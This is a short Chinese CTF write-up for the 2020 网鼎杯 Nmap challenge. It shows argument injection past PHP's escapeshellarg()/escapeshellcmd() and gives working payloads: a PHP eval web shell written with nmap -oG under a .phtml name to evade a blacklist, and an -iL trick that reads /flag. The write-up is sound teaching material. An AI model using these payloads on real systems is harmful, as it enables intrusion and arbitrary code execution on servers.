[网鼎杯 2020 朱雀组]Nmap
[网鼎杯 2020 朱雀组]Nmap
考点
Nmap使用
escapeshellarg()+escapeshellcmd() 之殇
文件上传bypass
phtml绕过php黑名单<?=绕过php黑名单
wp
抓包可以看到请求的内容为host=127.0.0.1,没有其他东西。
传入
127.0.0.1' -o xxxx,提示hostname是127.0.0.1\,访问xxxx无结果传入
127.0.0.1 -o xxxx'提示hostname是127.0.0.1 -o xxxx\',访问xxxx无结果传入
'127.0.0.1 -o xxxx ',提示Host maybe down访问xxxx,发现语句如下
nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/47cae -o xxxx \127.0.0.1 \\这就和[BUUCTF 2018]Online Tool一样,那传入127.0.0.1' -o xxxx,应该访问xxxx'
使用同样的payload,提示Hacker...
'<?php eval($_POST["a"]);?> -oG shell.php '测试发现过滤了php,<?php可以使用<?=绕过,写入的shell文件后缀可以使用phtml绕过
'<?=eval($_POST[1]);?> -oG shell.phtml '蚁剑连接或者直接连接即可。
在Nmap中还有一个参数-iL是从文件中加载URL,也就是说,可以利用这一点进行文件读取
127.0.0.1' -iL /flag -o xxxx
小结
最后更新于